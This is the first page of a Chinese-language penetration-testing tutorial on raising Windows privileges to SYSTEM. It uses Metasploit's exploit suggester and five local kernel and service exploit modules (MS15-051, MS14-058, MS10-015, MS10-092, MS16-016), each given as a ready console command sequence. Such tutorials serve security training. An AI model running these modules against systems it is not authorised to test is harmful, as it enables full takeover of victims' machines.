Windows内核漏洞利用提权教程

来源：本站整理作者：佚名时间：2018-10-01 TAG： 我要投稿

继上一篇“使用自动化脚本进行Windows提权”，本文将介绍有关Windows内核漏洞提权的方法。我将使用内置的Metasploit模块作为演示。通过本文的学习，你将了解系统的哪些部分可被利用，并匹配最佳可利用模块进一步的提升权限。
Windows-Exploit-suggester
Metasploit内置模块提供了各种可用于提权的local exploits，并会基于架构，平台（即运行的操作系统），会话类型和所需默认选项提供建议。这极大的节省了我们的时间，省去了我们手动搜索local exploits的麻烦。虽说如此，但也并非所有列出的local exploits都可用。所以，无论是漏洞利用还是查找最好的办法就是自动结合手动。
用法
注：要使用local exploit suggester，我们必须已在目标机器上获取到了一个Meterpreter session。在运行Local Exploit suggester之前，我们需要将现有的Meterpreter session调到后台运行（CTRL + Z）
示例，假设我们现在有一个Meterpreter session 1
use post/multi/recon/local_exploit_suggester
set LHOST 192.168.1.107
set SESSION 1
exploit
如下图所示，它自动的为我们匹配出了一些可能的用于易受攻击目标提权的漏洞利用模块。
>Windows内核漏洞利用提权教程-系统安全-黑吧安全网
Windows ClientCopyImage Win32k Exploit
Windows内核模式驱动程序特权提升漏洞。此模块利用了win32k.sys内核模式驱动程序中的不正确对象处理进行提权。
该模块已在Windows 7 x64和x86，Windows 2008 R2 SP1 x64的易受攻击版本上进行了测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ms15_051_client_copy_image
set lhost 192.168.1.107
set session 1
exploit
一旦exploit成功执行，就会打开另一个Meterpreter session
getsystem
getuid
可以看到，我们当前的用户权限已提升为了NT AUTHORITY/SYSTEM
>Windows内核漏洞利用提权教程-系统安全-黑吧安全网
Windows TrackPopupMenu Win32k NULL指针解引用
此模块利用了win32k.sys中的NULL指针解引用，漏洞可通过TrackPopupMenu函数进行触发。在特殊情况下，我们可以滥用在xxxSendMessageTimeout上的NULL指针解引用，来实现任意代码执行操作。
该模块已在Windows XP SP3，Windows Server 2003 SP2，Windows 7 SP1 Windows Server 2008 32位和Windows Server 2008 R2 SP1 64位上进行了测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ms14_058_track_popup_menu
set lhost 192.168.1.107
set session 1
exploit
一旦exploit成功执行，就会打开另一个Meterpreter session
getsystem
getuid
可以看到，我们当前的用户权限已提升为了NT AUTHORITY/SYSTEM
>Windows内核漏洞利用提权教程-系统安全-黑吧安全网
通过KiTrap0D提升Windows权限
此模块将通过KiTrap0D exploit创建具有SYSTEM权限的新会话，如果当前使用的会话权限已提升，则exploit将不会运行。该模块依赖于kitrap0d.x86.dll，因此在x64版本的Windows上不受支持。
该模块已在32位的Windows Server 2003，Windows Server 2008，Windows 7和XP易受攻击版本上进行了测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ms10_015_kitrap0d
set lhost 192.168.1.107
set session 1
exploit
一旦exploit成功执行，就会打开另一个Meterpreter session
getsystem
getuid
可以看到，我们当前的用户权限已提升为了NT AUTHORITY/SYSTEM
>Windows内核漏洞利用提权教程-系统安全-黑吧安全网
Task Scheduler XML提权
此漏洞发生在Task Scheduler中，可允许用户提升权限。如果攻击者登录到受影响的系统，并运行特制应用程序，则该漏洞可能允许特权提升。攻击者必须拥有有效的登录凭据，并且能够在本地登录才能成功利用此漏洞。远程或匿名用户则无法利用此漏洞。
该模块已在Windows Vista，Windows 7，Windows Server 2008 x64和x86的易受攻击版本上进行了测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ms10_092_schelevator
set lhost 192.168.1.107
set session 1
exploit
一旦exploit成功执行，就会打开另一个Meterpreter session
getsystem
getuid
可以看到，我们当前的用户权限已提升为了NT AUTHORITY/SYSTEM
>Windows内核漏洞利用提权教程-系统安全-黑吧安全网
MS16-016 mrxdav.sys WebDav本地提权
此模块利用了mrxdav.sys中的漏洞。其将在目标系统生成一个进程，并在执行payload之前将其权限提升到NT AUTHORITY/SYSTEM。
该模块已在Windows 7 SP1，x86架构的易受攻击版本上进行了测试。
让我们转到MSF控制台并执行该漏洞的exploit模块
use exploit/windows/local/ms16_016_webdav
set lhost 192.168.1.107
set session 1
exploit
一旦exploit成功执行，就会打开另一个Meterpreter session

[1] [2] 下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的，并不代表本站赞同其观点和对其真实性负责，仅适于网络安全技术爱好者学习研究使用，学习中请遵循国家相关法律法规。如有问题请联系我们，联系邮箱admin@myhack58.com，我们会在最短的时间内进行处理。

上一篇：CrackMapExec：一款针对大型Windows活动目录(AD)的后渗透工具【返回黑吧安全网首页】【进入黑吧技术论坛】

下一篇：浅谈PHP安全规范